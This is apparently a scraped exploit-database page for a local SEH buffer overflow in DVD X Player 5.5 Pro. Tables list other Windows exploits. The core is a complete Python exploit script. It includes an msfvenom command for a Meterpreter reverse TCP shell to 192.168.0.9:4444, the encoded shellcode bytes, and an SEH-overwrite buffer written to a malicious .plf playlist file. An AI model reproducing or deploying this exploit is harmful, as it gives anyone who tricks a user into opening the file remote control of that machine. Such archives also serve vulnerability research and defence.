Menu

Improved exploit search engine. Try it out

"DVD X Player 5.5 Pro - Local Buffer Overflow (SEH)"

Author

"Kevin Randall"

Platform

windows

Release date

2019-06-04

Release Date Title Type Platform Author
2019-06-14 "Aida64 6.00.5100 - 'Log to CSV File' Local SEH Buffer Overflow" local windows "Nipun Jaswal"
2019-06-13 "Pronestor Health Monitoring < 8.1.11.0 - Privilege Escalation" local windows PovlTekstTV
2019-06-11 "ProShow 9.0.3797 - Local Privilege Escalation" local windows Yonatan_Correa
2019-06-05 "IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Remote Code Execution (Metasploit)" remote windows Metasploit
2019-06-07 "Microsoft Windows - AppX Deployment Service Local Privilege Escalation (3)" local windows SandboxEscaper
2019-06-03 "Nvidia GeForce Experience Web Helper - Command Injection" local windows "Rhino Security Labs"
2019-06-04 "DVD X Player 5.5 Pro - Local Buffer Overflow (SEH)" local windows "Kevin Randall"
2014-11-24 "Microsoft Windows 8.1/ Server 2012 - 'Win32k.sys' Local Privilege Escalation (MS14-058)" local windows anonymous
2019-05-30 "Microsoft Windows Remote Desktop - 'BlueKeep' Denial of Service" dos windows n1xbyte
2019-05-28 "Petraware pTransformer ADC < 2.1.7.22827 - Login Bypass" remote windows "Faudhzan Rahman"
2019-05-23 "Microsoft Windows - AppX Deployment Service Local Privilege Escalation (2)" local windows SandboxEscaper
2019-05-29 "Free SMTP Server 2.5 - Denial of Service (PoC)" dos windows "Metin Yunus Kandemir"
2019-05-27 "Pidgin 2.13.0 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-24 "Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption" remote windows "Simon Zuckerbraun"
2019-05-24 "Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow" local windows "Uday Mittal"
2019-05-15 "Microsoft Windows - 'Win32k' Local Privilege Escalation" local windows ExpLife0011
2019-05-22 "Microsoft Internet Explorer 11 - Sandbox Escape" local windows SandboxEscaper
2019-05-22 "Microsoft Windows (x84) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation" local windows SandboxEscaper
2019-05-23 "Microsoft Windows 10 1809 - 'CmKeyBodyRemapToVirtualForEnum' Arbitrary Key Enumeration Privilege Escalation" local windows "Google Security Research"
2019-05-22 "Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation" local windows SandboxEscaper
2019-05-23 "Microsoft Windows 10 (17763.379) - Install DLL" local windows SandboxEscaper
2019-05-24 "Fast AVI MPEG Joiner - 'License Name' Denial of Service (PoC)" dos windows Achilles
2019-05-24 "Cyberoam General Authentication Client 2.1.2.7 - 'Server Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-23 "Terminal Services Manager 3.2.1 - Denial of Service" dos windows "Alejandra Sánchez"
2019-05-23 "NetAware 1.20 - 'Share Name' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-23 "NetAware 1.20 - 'Add Block' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
Release Date Title Type Platform Author
2019-06-04 "DVD X Player 5.5 Pro - Local Buffer Overflow (SEH)" local windows "Kevin Randall"
2019-04-30 "Freefloat FTP Server 1.0 - 'STOR' Remote Buffer Overflow" remote windows "Kevin Randall"
2019-04-30 "Freefloat FTP Server 1.0 - 'SIZE' Remote Buffer Overflow" remote windows "Kevin Randall"
2019-03-26 "Titan FTP Server Version 2019 Build 3505 - Directory Traversal / Local File Inclusion" webapps windows "Kevin Randall"
2019-03-13 "Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal" dos windows "Kevin Randall"
2019-03-13 "Core FTP Server FTP / SFTP Server v2 Build 674 - 'MDTM' Directory Traversal" dos windows "Kevin Randall"
2018-08-30 "DLink DIR-601 - Credential Disclosure" webapps hardware "Kevin Randall"
2018-04-02 "DLink DIR-601 - Admin Password Disclosure" webapps hardware "Kevin Randall"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46962/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46962/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46962/41371/dvd-x-player-55-pro-local-buffer-overflow-seh/download/", "exploit_id": "46962", "exploit_description": "\"DVD X Player 5.5 Pro - Local Buffer Overflow (SEH)\"", "exploit_date": "2019-06-04", "exploit_author": "\"Kevin Randall\"", "exploit_type": "local", "exploit_platform": "windows", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
# Exploit Title: DVDXPlayer 5.5 Pro Local Buffer Overflow with SEH
# Date: 6-3-2019
# Exploit Author: Kevin Randall
# Vendor Homepage: http://www.dvd-x-player.com/download.html#dvdPlayer
# Software Link: http://www.dvd-x-player.com/download.html#dvdPlayer
# Version: 5.5 Pro
# Tested on: Windows 7
# CVE : N/A

#!/usr/bin/python
###########Create Shellcode with MSFVenom###############################################################################################
##msfvenom shellcode generate: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.9 LPORT=4444 -b '\x00\x0A\x0D\x1A' -f python
########################################################################################################################################
file_name = "payloadofficial.plf"

#######################Copy and Paste Shellcode Here!!###########################
buf =  ""
buf += "\xd9\xe8\xb8\xa0\x7e\x18\xef\xd9\x74\x24\xf4\x5f\x2b"
buf += "\xc9\xb1\x56\x31\x47\x18\x83\xef\xfc\x03\x47\xb4\x9c"
buf += "\xed\x13\x5c\xe2\x0e\xec\x9c\x83\x87\x09\xad\x83\xfc"
buf += "\x5a\x9d\x33\x76\x0e\x11\xbf\xda\xbb\xa2\xcd\xf2\xcc"
buf += "\x03\x7b\x25\xe2\x94\xd0\x15\x65\x16\x2b\x4a\x45\x27"
buf += "\xe4\x9f\x84\x60\x19\x6d\xd4\x39\x55\xc0\xc9\x4e\x23"
buf += "\xd9\x62\x1c\xa5\x59\x96\xd4\xc4\x48\x09\x6f\x9f\x4a"
buf += "\xab\xbc\xab\xc2\xb3\xa1\x96\x9d\x48\x11\x6c\x1c\x99"
buf += "\x68\x8d\xb3\xe4\x45\x7c\xcd\x21\x61\x9f\xb8\x5b\x92"
buf += "\x22\xbb\x9f\xe9\xf8\x4e\x04\x49\x8a\xe9\xe0\x68\x5f"
buf += "\x6f\x62\x66\x14\xfb\x2c\x6a\xab\x28\x47\x96\x20\xcf"
buf += "\x88\x1f\x72\xf4\x0c\x44\x20\x95\x15\x20\x87\xaa\x46"
buf += "\x8b\x78\x0f\x0c\x21\x6c\x22\x4f\x2d\x41\x0f\x70\xad"
buf += "\xcd\x18\x03\x9f\x52\xb3\x8b\x93\x1b\x1d\x4b\xa2\x0c"
buf += "\x9e\x83\x0c\x5c\x60\x24\x6c\x74\xa7\x70\x3c\xee\x0e"
buf += "\xf9\xd7\xee\xaf\x2c\x4d\xe5\x27\x0f\x39\xf9\xbe\xe7"
buf += "\x3b\xfa\xd1\xab\xb2\x1c\x81\x03\x94\xb0\x62\xf4\x54"
buf += "\x61\x0b\x1e\x5b\x5e\x2b\x21\xb6\xf7\xc6\xce\x6e\xaf"
buf += "\x7e\x76\x2b\x3b\x1e\x77\xe6\x41\x20\xf3\x02\xb5\xef"
buf += "\xf4\x67\xa5\x18\x63\x87\x35\xd9\x06\x87\x5f\xdd\x80"
buf += "\xd0\xf7\xdf\xf5\x16\x58\x1f\xd0\x25\x9f\xdf\xa5\x1f"
buf += "\xeb\xd6\x33\x1f\x83\x16\xd4\x9f\x53\x41\xbe\x9f\x3b"
buf += "\x35\x9a\xcc\x5e\x3a\x37\x61\xf3\xaf\xb8\xd3\xa7\x78"
buf += "\xd1\xd9\x9e\x4f\x7e\x22\xf5\xd3\x79\xdc\x8b\xfb\x21"
buf += "\xb4\x73\xbc\xd1\x44\x1e\x3c\x82\x2c\xd5\x13\x2d\x9c"
buf += "\x16\xbe\x66\xb4\x9d\x2f\xc4\x25\xa1\x65\x88\xfb\xa2"
buf += "\x8a\x11\x0c\xd8\xe3\xa6\xed\x1d\xea\xc2\xee\x1d\x12"
buf += "\xf5\xd3\xcb\x2b\x83\x12\xc8\x0f\x9c\x21\x6d\x39\x37"
buf += "\x49\x21\x39\x12"
#################################################################################

#No Operations#
nops = "\x90"*20
shellcode = nops + buf

####Where all the magic happens! :)#####################################################################
buffer = "A"* 608 + "\xEB\x06\x90\x90" + "\x2E\x17\x64\x61" + shellcode + "D"*(1384-len(shellcode))
###################################################################################################
plf_file = open(file_name,"w")
plf_file.write(buffer)
plf_file.close()